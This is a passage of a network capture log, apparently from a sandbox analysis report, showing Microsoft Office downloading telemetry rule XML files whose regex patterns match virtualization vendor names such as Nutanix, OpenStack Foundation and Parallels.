                Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                ETag: "0x8DC582B9C710B28"
                x-ms-request-id: 1ed82642-401e-0048-7b12-170409000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012652Z-1657d5bbd48jwrqbupe3ktsx9w00000002x000000000twsr
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:52 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                Session IDSource IPSource PortDestination IPDestination Port
                55192.168.2.44980213.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:52 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:53 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:52 GMT
                Content-Type: text/xml
                Content-Length: 477
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                ETag: "0x8DC582BA54DCC28"
                x-ms-request-id: cde3aec9-601e-0084-63e5-166b3f000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012652Z-1657d5bbd48tqvfc1ysmtbdrg000000002q0000000008xsp
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:53 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                Session IDSource IPSource PortDestination IPDestination Port
                56192.168.2.44980313.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:53 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:53 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:53 GMT
                Content-Type: text/xml
                Content-Length: 419
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                ETag: "0x8DC582BB7F164C3"
                x-ms-request-id: 3a03d6b9-d01e-0066-52e9-16ea17000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012653Z-1657d5bbd48dfrdj7px744zp8s00000002mg0000000051qn
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:53 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                Session IDSource IPSource PortDestination IPDestination Port
                57192.168.2.44980413.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:53 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:53 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:53 GMT
                Content-Type: text/xml
                Content-Length: 477
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                ETag: "0x8DC582BA48B5BDD"
                x-ms-request-id: 678513bd-b01e-0053-4460-17cdf8000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012653Z-1657d5bbd48lknvp09v995n79000000002cg00000000g82q
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:53 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                Session IDSource IPSource PortDestination IPDestination Port
                58192.168.2.44980613.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:53 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:53 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:53 GMT
                Content-Type: text/xml
                Content-Length: 472
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                ETag: "0x8DC582BB650C2EC"
                x-ms-request-id: d803a4ff-401e-0083-3904-17075c000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012653Z-1657d5bbd48sdh4cyzadbb374800000002pg000000009cwd
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:53 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                Session IDSource IPSource PortDestination IPDestination Port
                59192.168.2.44980513.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:53 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:53 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:53 GMT
                Content-Type: text/xml
                Content-Length: 419
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                ETag: "0x8DC582B9FF95F80"
                x-ms-request-id: 46a5aa72-701e-0032-6004-17a540000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012653Z-1657d5bbd48p2j6x2quer0q028000000031g000000005u7z
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:53 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                Session IDSource IPSource PortDestination IPDestination Port
                60192.168.2.44980713.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:53 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:53 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:53 GMT
                Content-Type: text/xml
                Content-Length: 468
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                ETag: "0x8DC582BB3EAF226"
                x-ms-request-id: b0fdb72d-401e-0015-37ce-160e8d000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012653Z-1657d5bbd48xdq5dkwwugdpzr0000000030000000000ur29
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:53 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                Session IDSource IPSource PortDestination IPDestination Port
                61192.168.2.44981113.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:54 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:54 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:54 GMT
                Content-Type: text/xml
                Content-Length: 427
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                ETag: "0x8DC582BB556A907"
                x-ms-request-id: 0377c3fc-101e-000b-65dc-165e5c000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012654Z-1657d5bbd48xsz2nuzq4vfrzg800000002kg00000000rbr4
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:54 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                Session IDSource IPSource PortDestination IPDestination Port
                62192.168.2.44980913.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:54 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:54 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:54 GMT
                Content-Type: text/xml
                Content-Length: 411
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                ETag: "0x8DC582B989AF051"
                x-ms-request-id: 8d044b15-901e-00ac-3902-17b69e000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012654Z-1657d5bbd48p2j6x2quer0q028000000030000000000b02x
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:54 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                Session IDSource IPSource PortDestination IPDestination Port
                63192.168.2.44981013.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:54 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:54 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:54 GMT
                Content-Type: text/xml
                Content-Length: 470
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                ETag: "0x8DC582BBB181F65"
                x-ms-request-id: e72b6989-501e-005b-2b00-17d7f7000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012654Z-1657d5bbd48f7nlxc7n5fnfzh000000002gg000000002taf
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:54 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                Session IDSource IPSource PortDestination IPDestination Port
                64192.168.2.44981213.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:54 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:54 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:54 GMT
                Content-Type: text/xml
                Content-Length: 502
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                ETag: "0x8DC582BB6A0D312"
                x-ms-request-id: a5e58c1d-b01e-00ab-5ac9-16dafd000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012654Z-1657d5bbd48xsz2nuzq4vfrzg800000002ng00000000ewsf
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:54 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                Session IDSource IPSource PortDestination IPDestination Port
                65192.168.2.44981313.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:55 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:55 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:55 GMT
                Content-Type: text/xml
                Content-Length: 407
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                ETag: "0x8DC582B9D30478D"
                x-ms-request-id: 78a0432a-701e-001e-1805-17f5e6000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012655Z-1657d5bbd4824mj9d6vp65b6n4000000031g0000000066a5
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:55 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                Session IDSource IPSource PortDestination IPDestination Port
